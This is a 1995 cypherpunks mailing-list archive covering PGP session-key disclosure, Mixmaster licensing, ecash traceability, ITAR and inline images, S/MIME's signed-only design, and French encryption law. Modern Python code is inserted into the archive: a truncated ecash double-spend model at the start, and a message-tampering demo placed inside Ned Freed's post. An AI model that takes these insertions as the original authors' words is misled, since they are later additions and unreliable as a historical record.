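    return (bob, charlie, bank.can_link_alone(serial, sig),
            bank.can_link_with_payer(serial, sig, r))

def alice2_sting(bank):
    """Bill's sting: Alice pre-spends to 'Alice2' at t=5, then pays Bob at t=10."""
    serial, sig, _ = withdraw(bank)
    bank.deposit(serial, sig, "alice2", now=5)
    return bank.deposit(serial, sig, "bob-via-mix", now=10)
```

Calling `honest_payment(Bank())` returns `(('accepted', 10), ('already-spent', 10), False, True)`: Bob's deposit clears, Charlie's bounces, the bank alone cannot recognise the coin, and it can once Alice supplies `r`; `alice2_sting(Bank())` returns `('already-spent', 5)`, the bounce carrying a first-spend time earlier than the payment. What the model leaves out is exactly what the thread argues about next: the mix that makes the `"bob-via-mix"` channel actually anonymous, and the fact that Bob learns only at deposit time that the coin was dead.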
#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From stewarts at ix.netcom.com  Fri Sep 15 02:09:11 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 15 Sep 95 02:09:11 PDT
Subject: Scientology/Wollersheim as test case for key disclosure
Message-ID: <199509150908.CAA22173@ix3.ix.netcom.com>

At 02:42 PM 9/9/95 -0400, Phill wrote:
>One solution to this problem would be to modify PGP so that the session key for
>the document was released rather than the passphrase for the public key. The
>former would provide only read access, the latter would allow the scientologists
>to forge Wollersheim's signature on other material. In addition many of the
>documents may be subject to privilege.

It wouldn't be hard, though I'm not sure it's much different from
requiring the owner of the public key to decrypt the document in the first
place. It does give you some verifiability (somebody else can take the
session key and demonstrate that encrypting it with the recipient's public
key does or does not produce the encrypted-key string in the document
being verified.) If that's what you plan to use it for, you would also
need to have the entire padded session key and not just the session key
itself.

Total amount of work to implement - another command-line option, a print
statement, and maybe another command-line option and bit of code to allow
decryption of a public-key-encrypted document using a command-line-supplied
session key.

#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From alano at teleport.com  Fri Sep 15 02:23:14 1995
From: alano at teleport.com (Alan Olsen)
Date: Fri, 15 Sep 95 02:23:14 PDT
Subject: Mixmaster status
Message-ID: <199509150922.CAA12760@desiree.teleport.com>

>Let me be crystal clear.
>1) I will not support any version of Mixmaster that is weakened.
>2) All future clients will be able to generate the current message format.
>3) All future servers will be able to read the current message format.
>4) There will always be a free version of the client with source code.

But will the commercial version of the server come with source code?

>While I have not discussed it, I can not imagine that there would not also
>be a free version of the server code (with source). Without remailers what
>is the point of the client software?

Will Mixmaster become the Netscape(tm) of remailers? And when is the IPO? ];>

| Visualize whirled keys                         | alano at teleport.com  |
|"It's only half a keyserver. I had to split the | Disclaimer:          |
|other half with the government man." - Black Art| Ignore the man       |
|  -- PGP 2.6.2 key available on request --      | behind the keyboard. |
|      http://www.teleport.com/~alano            |                      |

From liberty at gate.net  Fri Sep 15 02:49:17 1995
From: liberty at gate.net (Jim Ray)
Date: Fri, 15 Sep 95 02:49:17 PDT
Subject: cryptography eliminates lawyers?
Message-ID: <199509150944.FAA48388@tequesta.gate.net>

-----BEGIN PGP SIGNED MESSAGE-----

Brian Davis wrote:
>Last I checked, FDA, UL, or state bar association approval does not
>*require* you to take, use, or hire the approved drug, toaster or lawyer.
>Market forces are still at work, albeit in a filtered environment.

The filter is weakest from UL, yet I trust its output the most.

>Just a first cut. And even that can usually be gotten around.

Getting around David KeSSler involves about $30 million and a *bunch* of
lawyers. Skipping this first cut, even with far safer products (IMO) than
"Proscar," can lead to an armed raid of your doctor's office. If state
bars can usually be gotten around, why take three of them?
JMR

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMFk2Jm1lp8bpvW01AQESMwP/abBCBbhGKOjVFFkjl4elOcTA3oD9WgEa
e+AsmtuLSEstvSfZ6u3CxO5sfu0lka0erBsVyDjqWs97WlvQOD0qX+3O91hoURp4
pytfTSE+MtTlIQCIoxVBMgjOYplNLOOYmnomksypJFpOzyuofoYnIScfRLkAWvAB
SFEqvrCtfP8=
=cfgW
-----END PGP SIGNATURE-----

Regards, Jim Ray

"When making public-policy decisions for the government, I think one
should ask oneself which technologies would best strengthen the hand of a
police state. Then, do not allow the government to deploy those
technologies." -- Phillip Zimmermann, talking to himself. (Congress
sure-as-hell wasn't paying attention!)
-----------------------------------------------------------------------
PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8
Key id. # E9BD6D35 James M. Ray
-----------------------------------------------------------------------
Help Phil! email zldf at clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________

From aba at dcs.exeter.ac.uk  Fri Sep 15 02:57:45 1995
From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk)
Date: Fri, 15 Sep 95 02:57:45 PDT
Subject: Linking = Showing = Transferring?
Message-ID: <9935.9509150957@exe.dcs.exeter.ac.uk>

Rich Salz writes:
> >Suppose we interpret Linking = Showing as
> >
> >For all web pages x and y,
> >Showing(x) and Linkto(x,y) --> Showing(y)
>
> Then we would be fools. No more so than buying a book means you
> have instant access to all resources mentioned as footnotes or in
> the bibliography.
>
> Put more simply, *you have to click on Y* so they're not the same.

Another even more subtle problem is inline images: can you say that a
page with an inline image sourced from a foreign site must obey the
foreign jurisdiction? I would assert this is so, because the web surfer's
*browser* imports the relevant parts of the page from whatever locations
(and jurisdictions) they are in, and displays them as one page.

Take a look at:

http://www.obscura.com/~shirt/

which is the www space Lance kindly donated for the UK munitions-T. The
relevance to this discussion is that www.obscura.com is of course in the
US, whilst the inline graphic is in the UK for ITAR reasons, the image is
of:

#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0

So that the image is *imported* by the *viewer*, and not supplied by
www.obscura. This means that people outside the US can also view the page
without anyone breaking any laws, even though it appears to contain
(allegedly) ITAR contravening material. Same would apply quite nicely to
porn from the netherlands etc.

[as an aside, anyone got info on how you go about converting gifs to
transparent gifs - I want the above to be transparent so that it still
works on other than a black background in case other people use it on
other backgrounds]

Adam

From frissell at panix.com  Fri Sep 15 02:59:33 1995
From: frissell at panix.com (Duncan Frissell)
Date: Fri, 15 Sep 95 02:59:33 PDT
Subject: Linking = Showing = Transferring?
In-Reply-To: <199509150047.UAA18025@book.hks.net>
Message-ID:

On Thu, 14 Sep 1995, Lucky Green wrote:
> The answer is trivial. If it pisses off the fascists in power enough, you
> go to jail or get killed.
>
> - --
> - -- Lucky Green

As a libertarian nut, I bow to no one in my love of extreme statements.
But I feel compelled to squash this particular notion whenever I see it.
Randy Weaver really pissed off the Feds and did not go to jail (except
during trial) and received a $3.1 million settlement. (.1 to him, 3 to
the kids but they are minors).

DCF

From rsalz at osf.org  Fri Sep 15 04:15:11 1995
From: rsalz at osf.org (Rich Salz)
Date: Fri, 15 Sep 95 04:15:11 PDT
Subject: Linking = Showing = Transferring?
Message-ID: <9509151114.AA07872@sulphur.osf.org> >Another even more subtle problem is inline images, can you say that a >page with an inline image sourced from a foreign site must obey the >foreign jurisdiction. I would assert this is so, because the web >surfer's *browser* imports the relevant parts of the page from >whatever locations (and jurisdictions) they are in, and displays them >as one page. Inline images are not references -- they are part of the page being retrieved. > >So that the image is *imported* by the *viewer*, and not supplied by >www.obscura. Inlined images are just a convenient way of chunking. The image is imported by the viewer because the server, as part of the base document, told it to do so. You might be able to fool an ignorant court, but it still doesn't change the fact that Lance has a document that in the natural course of operation of the Web, exports crypto. I would advise him to edit the page so it reads Click here to see a picture of the shirt. Heck, the very word, "inline" gives it away. /r$ From rsalz at osf.org Fri Sep 15 04:18:35 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 15 Sep 95 04:18:35 PDT Subject: Some informed comments on RSA's S/MIME Message-ID: <9509151118.AA07881@sulphur.osf.org> Date: Thu, 14 Sep 1995 08:39:49 -0700 (PDT) >From: Ned Freed Subject: Re: Re[2]: MOSS conformance testing Cc: pem-dev at TIS.COM Message-id: <01HV9F2PHBSU8Y4Z8U at INNOSOFT.COM> > I just got wind of RSA's draft for Content-Type: application/x-pkcs7-mime. > Has there been any discussion on this - comparison to PEM etc.? If so > where's the list, URLs of archives....? Or did I just go "deaf" for a while > here on thist list? (The last could of months have been caught up in > changing companines...) S/MIME was developed privately by RSA in conjunction with a number of other companies. To the best of my knowledge all discussion has occurred on closed, private lists. 
As a potential customer of RSA I recently managed to get myself added to one of these lists (it may or may not be the only one where S/MIME is discussed) but I haven't had time to post anything there yet. I plan to post this message there in the next couple of days. I'm not saying this approach to protocol development is a good thing or a bad thing, but I do believe that it has led to the production of a specification that is seriously flawed, and that those flaws would have been detected and probably corrected had the discussion been more public. More on this below. > I browsed through the IETF drafts & personal contributions & search tool... > didn't find anything on RSA's "S/MIME". > I did get the PostScript file from RSA's pages & had a read.... > http://www.rsa.com/pub/S-MIME/ The specification, at least, is public. Given the amount of press surrounding this proposal and the strong liklihood of it being widely used I strongly recommend that everyone who is interested in email security obtain a copy of the specification and read it. However, the proposal is simple enough that it can be summarized in just two paragraphs. S/MIME is based on PKCS #7, which in turn is based on classic PEM. The significant difference between PKCS #7 and PEM is that it uses an ASN.1 encoding for the entire security object rather than the header/text encoding of RFC1421. In fact the specification states that mechanical conversion between RFC1421 formats and PKCS #7 should be possible as long as the proper set of algorithms are used. I think that mechanical conversion into and out of the PEM-derived subset of MOSS is also feasible but I haven't checked up on the specifics of this. S/MIME in turn is a simple encapsulation of PKCS #7 in MIME, consisting of an application subtype label and an encoding of the PKCS #7 object using standard MIME encodings. The inner secured content is then seen as another MIME object. 
This is almost identical to Jeff Schiller's earlier proposal for embedding PEM in MIME. There is only one significant twist -- in the case of signed but not encrypted data the specification calls for the use of multipart/alternative, with the first part being an unsigned copy of the signed data and the second part being the PKCS #7 object, including the signed data. Two obvious flaws in this approach should be obvious from this description. The first is simply one of excessive overhead -- sending signed material in such a way that it can be read on vanilla email systems as well as with an S/MIME system introduces something on the order of 133% overhead. The second flaw is more serious. The data that a user without S/MIME reads is not signed. This opens the door to attacks where the unsigned version is tampered with but the signed version is left alone. This turns into a really insidious problem when you consider how privacy services are likely to be deployed in some environments. One model I expect to be rather popular is that of having a remote signature verification service within a secure enclave. That is, most of the user agents that people use won't have the ability to validate a signature. Users will, however, have secure access to an agent that will validate the signature on a message for them. (The service may well be a different application on the same machine.) They simply submit the message to this service and it tells them whether or not the signature matches. The problem, of course, is that the material the user of the unextended agent reads isn't what's signed. And in general there is no way to correlate this material with the signed copy -- since it was exposed to the message transport layer without any special tagging to indicate its signed nature the transport may well have changed it so its no longer a byte-for-byte copy of the signed version (which is inherently protected against such munging). 
Comparing this approach with security multiparts is quite instructive. Security multiparts only introduces the overhead necessary to encode the single copy of the data -- at most 33% in the case of base64 -- plus of course the fixed overhead of the signature information. As such, it is far more efficient than S/MIME when it comes to signed but unencrypted material. Security multiparts can be processed in a single pass as well. I'm not sure this is true of S/MIME -- it depends on the specifics of the ASN.1 structure that's used. But by far the most important difference is that security multiparts do not suffer from this vulnerability when used in an environment with remote security servers.

You can of course avoid this problem by not including the extra copy of the signed material. The problem with this approach is that you won't be able to read such a message on anything short of an agent that knows how to take apart a PKCS #7 structure.

I note in passing that there was absolutely no reason why security multiparts could not have been used in S/MIME instead of the chosen encapsulation. PKCS #7 explicitly provides a facility whereby the secured data is stored outside of the ASN.1 object. This then fits seamlessly into the security multiparts methodology.

I do not propose to debate the relative merits of PKCS #7 versus MOSS. Modulo the MIME issues this is essentially the same as debating the merits of PEM versus MOSS, and I've had more of that than I care for. Besides, I think folks should use whatever security service they feel like using. I've maintained all along that my interest is primarily that of standardizing on a single embedding methodology for use with MIME. I'm very disappointed that S/MIME has seen fit to use what to my mind is a technically inferior embedding solution when compared to security multiparts, and I'd really like to try to get the S/MIME folks to switch to a security multiparts approach if it's not too late for them to do so.
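The two signed-only layouts Ned compares, built and checked side by side. This is an added example, not code from the original post or from RSA's specification; an HMAC-SHA256 under a constructed key stands in for the PKCS #7 signature so the demo runs offline, and the body text and "--sig--" separator are constructed.

```python
"""Constructed demo: S/MIME multipart/alternative versus RFC 1847 multipart/signed.

A stand-in signature (HMAC-SHA256 under a constructed key) replaces the
PKCS #7 signature.  The structural point is unchanged: in the S/MIME
signed-only layout the copy a plain MIME reader displays is not the copy
that is signed, so it can be altered without disturbing the signature.
"""
import hashlib
import hmac
from email import message_from_bytes
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

SIGNING_KEY = b"constructed-demo-key"   # stands in for the signer's private key
SEP = b"\n--sig--\n"                    # stands in for the PKCS #7 structure


def sign(data: bytes) -> str:
    """Stand-in for a detached PKCS #7 signature over `data`."""
    return hmac.new(SIGNING_KEY, data, hashlib.sha256).hexdigest()


def canonical(data: bytes) -> bytes:
    """Line-ending canonicalization, as RFC 1847 requires before signing."""
    return data.replace(b"\r\n", b"\n").rstrip(b"\n")


def smime_alternative(body: str) -> bytes:
    """S/MIME signed-only layout: an unsigned readable copy in part 1 and a
    PKCS #7-style object in part 2 that carries its own copy of the data."""
    signed_copy = body.encode()
    outer = MIMEMultipart("alternative")
    outer.attach(MIMEText(body, "plain"))            # what a vanilla UA shows
    blob = signed_copy + SEP + sign(signed_copy).encode()
    outer.attach(MIMEApplication(blob, "x-pkcs7-mime-standin"))  # base64 shields it
    return outer.as_bytes()


def security_multiparts(body: str) -> bytes:
    """RFC 1847 multipart/signed: the displayed part is the signed part."""
    outer = MIMEMultipart("signed", protocol="application/x-signature-standin")
    outer.attach(MIMEText(body, "plain"))
    sig = sign(canonical(body.encode())).encode()
    outer.attach(MIMEApplication(sig, "x-signature-standin"))
    return outer.as_bytes()


def tamper_displayed(raw: bytes, new_text: str) -> bytes:
    """Alter only the first body part, the one a non-S/MIME reader displays."""
    msg = message_from_bytes(raw)
    msg.get_payload()[0].set_payload(new_text)
    return msg.as_bytes()


def verify_smime_alternative(raw: bytes) -> dict:
    """Check the signature over the embedded copy, then separately check
    whether the displayed copy still matches it (the comparison a remote
    verification service cannot make for a user who only sees part 1)."""
    shown, blob = message_from_bytes(raw).get_payload()
    signed_copy, _, sig = blob.get_payload(decode=True).rpartition(SEP)
    return {
        "signature_ok": hmac.compare_digest(sign(signed_copy), sig.decode()),
        "displayed_matches_signed":
            canonical(shown.get_payload(decode=True)) == canonical(signed_copy),
    }


def verify_security_multiparts(raw: bytes) -> bool:
    """Verify the signature over the very part that is displayed."""
    shown, sig_part = message_from_bytes(raw).get_payload()
    expected = sign(canonical(shown.get_payload(decode=True)))
    return hmac.compare_digest(expected, sig_part.get_payload(decode=True).decode())


def demo() -> dict:
    """Sign a constructed message both ways, tamper with the displayed part of
    each 'in transit', and re-verify."""
    body, forged = "Pay Bob 10 dollars.", "Pay Eve 10 dollars."
    alt, secmp = smime_alternative(body), security_multiparts(body)
    return {
        "smime_intact": verify_smime_alternative(alt),
        "smime_tampered": verify_smime_alternative(tamper_displayed(alt, forged)),
        "secmp_intact": verify_security_multiparts(secmp),
        "secmp_tampered": verify_security_multiparts(tamper_displayed(secmp, forged)),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The tampered multipart/alternative message still reports a valid signature, and only the extra displayed-versus-signed comparison catches the change; the tampered multipart/signed message simply fails verification.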
I'm very interested in any and all comments on what I've written here. I intend to post them to the S/MIME list I'm now on.

Ned

From aba at dcs.exeter.ac.uk Fri Sep 15 04:43:58 1995
From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk)
Date: Fri, 15 Sep 95 04:43:58 PDT
Subject: Linking = Showing = Transferring?
In-Reply-To: <9509151114.AA07872@sulphur.osf.org>
Message-ID: <10345.9509151143@exe.dcs.exeter.ac.uk>

> > [using inline images to display theoretically ITAR violating gifs]
>
> Inline images are not references -- they are part of the page being
> retrieved.
>
> >So that the image is *imported* by the *viewer*, and not supplied by
> >www.obscura.
>
> I would advise him to edit the page so it reads
>
> Click here
> to see a picture of the shirt.

I wrote the page, Lance kindly provided www space which I set up, he's seen it, and thought it funny even. Sounds like you seriously think this is a danger to Lance, something I hoped I avoided by using an inline from outside the ITAR zone.

> Inlined images are just a convenient way of chunking. The image is
> imported by the viewer because the server, as part of the base
> document, told it to do so. You might be able to fool an ignorant
> court, but it still doesn't change the fact that Lance has a
> document that in the natural course of operation of the Web, exports
> crypto.

Weeell, I'm not so sure. I mean the page says to view this page first get this picture from here, this one from here, this text, format and display. It is not illegal to say *where* to get crypto, just illegal to export it, right? He hasn't exported it, just told the viewer where to fetch it from.

I think this case is safer than the porn one, because the actual data in this case is legal in both jurisdictions, it just must not be transferred from jurisdiction US -> jurisdiction non-US, which it has not been.
If it were something which was illegal in the US, hmm, let's say an image of a slightly underage (underage under US definitions, not Dutch) Dutch porn star, then having links to it might be argued as incitement to view something which it would be illegal to view in the US, something which is effectively illegal to import into the US.

I would agree with you were the information imported by way of an inline image actually illegal in the US, as the person loading would have no choice. In such a case a disclaimer might be appropriate:

    warning, it may be illegal to import the following link into the US,
    I will not be responsible if you are in the US and click on this link

But what is there to disclaim with inline data which is itself legal in both jurisdictions, and the only legal question being the transfer of that data from US -> UK, which the protocol ensures does not happen?

Browser in the US, text in US, crypto gif imported from UK, both legal.
Browser outside US, text in US, crypto gif imported from UK, both legal.

See a flaw in that? Try that in France might be more interesting, where it really is illegal to import crypto.

It's kind of theoretical, but an interesting argument... what happens when this happens with porn, is perhaps a more tricky question, re possible illegality of import from outside US, maybe in such cases you should request the viewer to turn off autoload of images, so that they must request them after reading the disclaimer text. Or perhaps it would be necessary to ensure that it never happens automatically without the user clicking on a button certifying that they are not in the US, the antithesis of MIT's I affirm I am a US citizen blah, blah, that goes with getting PGP from their site (I didn't get it btw, I just read the questions for my amusement).
Adam

From pfarrell at netcom.com Fri Sep 15 05:03:32 1995
From: pfarrell at netcom.com (Pat Farrell)
Date: Fri, 15 Sep 95 05:03:32 PDT
Subject: Why ecash is traceable
Message-ID: <28922.pfarrell@netcom.com>

tcmay at got.net (Timothy C. May) writes:
> Hal, a very nice summary!

Yes, good job Hal.

> Why not "online clearing" as the preferred model, then?

Because you lose most (all?) anonymous abilities. (I think)

> (There are more abstract ways of viewing this advantage. While mere
> software is always duplicable, and cash numbers are of course duplicable,
> one thing that is not duplicable is this: "the first agent to present a
> valid number at this bank." There can be only one of these, and this
> uniqueness is what keeps the currency from collapsing, what introduces
> _conservation_ into the system.)
>
> Well, since Alice knows her own blinding factors, she will always be able
> to say to the bank: "My cash will look like this. Watch for it."

So when the money Alice gave to Bob gets deposited by TCMay, that it was Alice's is instantly known. This is not how physical cash works.

There is a chain from TCMay through some number of steps to Bob. Even if you can't find it with this single case, you could use a zero-knowledge type proof to slowly uncover Bob's identity.

I keep wanting to believe in ecash, but I'm not convinced it can exist.

Pat

Pat Farrell      Grad Student       http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage                                      #include

From jya at pipeline.com Fri Sep 15 05:23:33 1995
From: jya at pipeline.com (John Young)
Date: Fri, 15 Sep 95 05:23:33 PDT
Subject: VIO_lat
Message-ID: <199509151223.IAA22176@pipe4.nyc.pipeline.com>

9-15-95. NYPaper:

"Company Says Electronic Mail Was Opened to Find Pornography."
America Online gave the FBI access to the mailboxes of its subscribers to identify several thousand users who viewed images of children in sexual poses and to trace messages beyond AOL to many more computer users nationwide. Because electronic mail has a life of days or weeks, can be traced and can be easily copied without alerting the owner, reading the mailboxes was particularly effective. It was unclear how much information about subscribers is routinely kept and how much private information was provided to the FBI. Actions of users can be recorded and can reveal much more personal information than the records of a telephone company.

"F.B.I. Chemist Says Experts Are Pressured To Skew Tests."

Officials at the F.B.I. crime laboratory have been accused by one of its chemists, Frederic Whitehurst, of pressuring forensic experts to commit perjury to help secure criminal convictions. With opinion polls showing public support for the F.B.I. eroding after Congressional hearings into the Branch Davidian siege, the accusations regarding the laboratory are in some ways the worst blow yet.

Two: VIO_lat (11 kb)

From kelso at netcom.com Fri Sep 15 05:23:39 1995
From: kelso at netcom.com (Tom Rollins)
Date: Fri, 15 Sep 95 05:23:39 PDT
Subject: Why ecash is traceable
In-Reply-To: <28922.pfarrell@netcom.com>
Message-ID: <199509151220.FAA00243@netcom4.netcom.com>

Pat Farrell says:
> Because you lose most (all?) anonymous abilities. (I think)
> So when the money Alice gave to Bob gets deposited by TCMay,
> That it was Alice's is instantly known. This is not how physical cash works.
>
> There is a chain from TCMay through some number of steps to Bob.
> Even if you can't find it with this single case, you could use
> a zero-knowledge type proof to slowly uncover Bob's identity.
>
> I keep wanting to believe in ecash, but I'm not convinced
> it can exist.

Just a little humor...

Perhaps Electronic Cash has a sound.

Phone Phreakers have something called a Redbox.
This device makes the sound of a quarter. When an ATT pay phone asks you to deposit $1.75 you just make the sound of 7 quarters... :)

From nelson at crynwr.com Fri Sep 15 05:59:09 1995
From: nelson at crynwr.com (Russell Nelson)
Date: Fri, 15 Sep 95 05:59:09 PDT
Subject: Mixmaster status
In-Reply-To:
Message-ID:

   Date: Fri, 15 Sep 1995 01:03:58 -0700
   From: loki at obscura.com (Lance Cottrell)

   Let me be crystal clear.
   1) I will not support any version of Mixmaster that is weakened.
   2) All future clients will be able to generate the current message format.
   3) All future servers will be able to read the current message format.
   4) There will always be a free version of the client with source code.

   And also that Mixmaster(tm) is a trademark of Lance Cottrell, and as long as he owns it, he controls the use of it. If you trust Lance, you can trust the name Mixmaster(tm).

   While I have not discussed it, I can not imagine that there would not also be a free version of the server code (with source). Without remailers what is the point of the client software?

I'm confused here. Isn't every copy of mixmaster potentially a client and/or server? That seems to me to be one of the beautiful aspects of mixmaster -- run a remailer and you greatly increase your own privacy.

--
-russ                 http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 (9201 FAX)                  | America neither a Christian,
Potsdam, NY 13676 |                                             | Jewish, Islamic, nor atheist (etc&) nation. This is good.
From anonymous at freezone.remailer Fri Sep 15 06:08:25 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Fri, 15 Sep 95 06:08:25 PDT
Subject: Chiffrement en Fr
Message-ID: <199509151308.JAA21250@light.lightlink.com>

A web search for Quisquater led to:

URL: http://www.cnam.fr/Network/Crypto/

which offers, among other fine pieces of crypto writing:

THE USE OF ENCRYPTION IN FRANCE

Encryption is the technique of modifying a file so as to make it unreadable by people it is not intended for. Long the preserve of the military, it is now an indispensable tool in the age of networks for those who want to protect the confidentiality of their messages. Its use raises various questions. While this Web page is one of the first in France, there are many in the United States.

I will not say much about technique on this page. If you want to know more, look at:

* The excellent server of the Groupe de Recherche en Complexité et Cryptographie,
* A few modest explanations.

Encryption is practically forbidden in France by law 90-1170 of 29 December 1990 (with an implementing decree in December 1992). An excellent little brochure (with a sphinx on the cover :-) from the Délégation Interministérielle pour la Sécurité des Systèmes d'Information (DISSI) explains this law (but unfortunately does not detail the actual conditions of its application). It is sent free of charge on simple request:

    DISSI
    3 avenue Octave Gréard
    75007 PARIS

It is the Service Central de la Sécurité des Systèmes d'Information (SCSSI) that must be contacted for more information and for filing requests for authorization. There are two cases:

1. Either you use encryption solely for authentication (encrypting passwords so that they do not travel in the clear over the network, for example): you must file a declaration with the SCSSI, which is then checked.
2. Or you use it for confidentiality. You must then request an authorization from the SCSSI.

    SCSSI
    18, rue du Docteur Zamenhof
    92131 ISSY-LES-MOULINEAUX Cedex
    Tél. : (1) 40 95 37 15
    Fax. : (1) 40 95 37 01

In both cases, the request may have been made by the developer or the vendor of the software. More details are given in Bruno Malhey's presentation (also in PostScript).

I would add that the criteria for acceptance or refusal are not public. It seems that authorization is granted only to "serious" institutions (banks, ...) and on condition of not using software that is too effective. The aim, in fact, is to preserve the ability of the police to follow the exchanges. Note that most countries comparable to France allow encryption, as shown by Sylvain André's excellent survey (you can also see the American government's study).

The best-known encryption software is PGP (Pretty Good Privacy). Free, fairly simple to use, very effective, well documented, running on many platforms (Unix, MS-DOS, Macintosh), it is an excellent tool for the user. It seems that its authorization in France is out of the question. Note that if you want to use PGP in France, you face two successive obstacles:

1. PGP is barred from export by the United States. You therefore have to retrieve one of the (many) versions from a non-American server.
2. Encryption is subject to authorization in France. See above.

Some people find that another obstacle to using PGP is its difficulty of use. They can read Garfinkel's remarkable book:

    Simson Garfinkel
    PGP: Pretty Good Privacy
    O'Reilly & Associates
    ISBN 1-56592-098-8

And there are other presentations of PGP, such as Ollivier Robert's (PostScript files PGP.*.ps), which also exists in the form of a Web server.

PGP protects files, either during their transmission over the network (by electronic mail or another method) or locally. Other software protects, for example, remote connections or the X window system (SSH provides both functions). Visit the "International Cryptography Pages" Web service for all the information you could want, in particular on software available outside the United States.

Finally, after this purely factual information, here is my opinion.

See also

* The Electronic Frontier Foundation, which fights for the rights of the citizen in the computerized world, has a great deal of information on encryption.
* Computer Professionals for Social Responsibility also works on respect for privacy.
* Also in French, but concerning Quebec more specifically.

Page made by Stéphane Bortzmeyer on the CNAM server. Last updated 4 August 1995.

From anonymous at freezone.remailer Fri Sep 15 06:14:54 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Fri, 15 Sep 95 06:14:54 PDT
Subject: Smart Cards, Credit cards, Payment systems
Message-ID: <199509151314.JAA21423@light.lightlink.com>

URL: http://www.dice.ucl.ac.be/~dhem/card.html

Smart Cards, Credit cards, Payment systems.

This page is under development.
_________________________________________________________________

Card Europe
DigiCash
MasterCard
Futur 1, 2
Virtual Open Network Environment (V-ONE)
MONDEX
AT&T and GiroVend agree to promote smart card applications
AT&T Universal Card Services
ATT buyinfo
ibd.ar.com/lists/comp/cypherpunks
Discussions, mailing lists, and sites, Payment mechanisms designed for the Internet
News items on information technology (Not especially Smart Cards)
Electronic Cash, Tokens and Payments in the National Information Infrastructure
Forum On Risks To The Public In Computers And Related Systems (ACM)
The Risks Digest Volume 4: Issue 32
The Risks Digest Volume 15
The Risks Digest Volume 16
SMI Finger Check -- Fingerprint Verifier
DIGITAL SRC Research Reports
Authentication and Delegation with Smart-cards
Innovonics
QC consultancy
University of Wollongong: Centre for Computer Security Research
SecureWare, Inc.
OKI Telecom
(Smart) Cards Museum (big)
Buying Prepaid Calling Card
S. Brands
Cyberbank '95
Electronic benefits transfer (EBT) in US
NCSA/DTIC Security Seminar
Power Broker
First Union Corp. will offer stored-payment ''smart cards''
Network Payment Mechanisms and Digital Cash
PCMCIA Cards
THE PREPAID & RECHARGEABLE PHONE CARD
Cardservice International

_________________________________________________________________

UCL crypto group

_________________________________________________________________

Last update: 11 September 1995.
Send any comment to: Dhem at dice.ucl.ac.be (J.-F. Dhem)

From anonymous at freezone.remailer Fri Sep 15 06:53:09 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Fri, 15 Sep 95 06:53:09 PDT
Subject: Loi Log
Message-ID: <199509151352.JAA23300@light.lightlink.com>

There was an uncharacteristically long delay (2+ hours) in receiving documents from the site, including those linked to non-fr sites. Not sure if it is due to self-applied site restrictions or the other loi-logging.
From kelli at zeus.towson.edu Fri Sep 15 06:59:18 1995
From: kelli at zeus.towson.edu (K. M. Ellis)
Date: Fri, 15 Sep 95 06:59:18 PDT
Subject: CYPHERPUNK considered harmful.
In-Reply-To:
Message-ID:

On Wed, 13 Sep 1995, Timothy C. May wrote:

> > We too often think of ourselves as an elite - smarter and better in
> >various ways to our non-cpunk neighbours. We refer to these others as
> >'Joe Sixpack" and other such derogatory terms.
> >
> > The problem is that in doing so we are marginalizing ourselves.
> >
> > We call ourselves 'cypherpunks'. While this is derived from the SF
> >term 'cyberpunk', consider the image we are creating for ourselves:
> >
> > A 'punk' is a marginalized young adult, one who rejects the norms
> >of his or her society, and takes delight in irking those around him with
> >his or her rejection. The older of us will think of James Dean in 'Rebel
> >Without a Cause', or Brando in 'The Wild One'. Later, you get images
> >such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and
> >other icons of the 'punk rock' movement.
>
> While I have had some qualms about the name, on balance I think it has been
> good for us. After all, it's not as if _other_ groups don't already exist!
> In particular, the British branch of Cypherpunks disliked the name
> "Cypherpunks" so much that they used a different name for themselves, the
> "U.K. Crypto Privacy Association." It doesn't seem to exist anymore, for
> whatever reasons. But the name may have been a factor, at least.

I agree with Peter's point... some of the core cypherpunks (I'll not mention names) can be somewhat elitist, whether they mean to or not. Not that they don't have some reason to be...as Pat Farrell once told me the cypherpunks mailing list is, to some degree, an IQ filter. Many cypherpunks have a firm reason for some self-indulgent pride.
However, our goal (or, at any rate, _a_ goal) is to make crypto use ubiquitous, and for this we must deal with the public at large in a, perhaps, more diplomatic and user-friendly manner. 8>

> We fill a certain niche which is useful to have filled, a more radical
> facet of things. If we didn't exist, or renamed ourselves "Concerned
> Citizens for Cryptographic Protection," CCCP, then somebody would have to
> _invent_ the Cypherpunks!

True, but if the majority of active participants see an alternative agreeable to them, they may just switch and start calling themselves something else. If the list owner likes it and changes the name of the list, then what of the cypherpunks unwilling to change? It would appear, then, that they would be the ones who would have to find somewhere else to go.

> - We are actually not very "punkish" at all. About as punkish
> as most of our cyberpunk cousins are, which is to say, not
> very.

Anybody who reads the mailing list or the cyphernomicon knows this, but anyone hearing the name for the first time does not get this impression.

> Getting back to your suggestion that "we" change the name to something more
> respectable. How could "we" do this, given that "we" are an effective
> anarchy?
>
> I can't imagine a vote on this, and the endless debates on what "we" ought
> to call ourselves would be a waste of time.

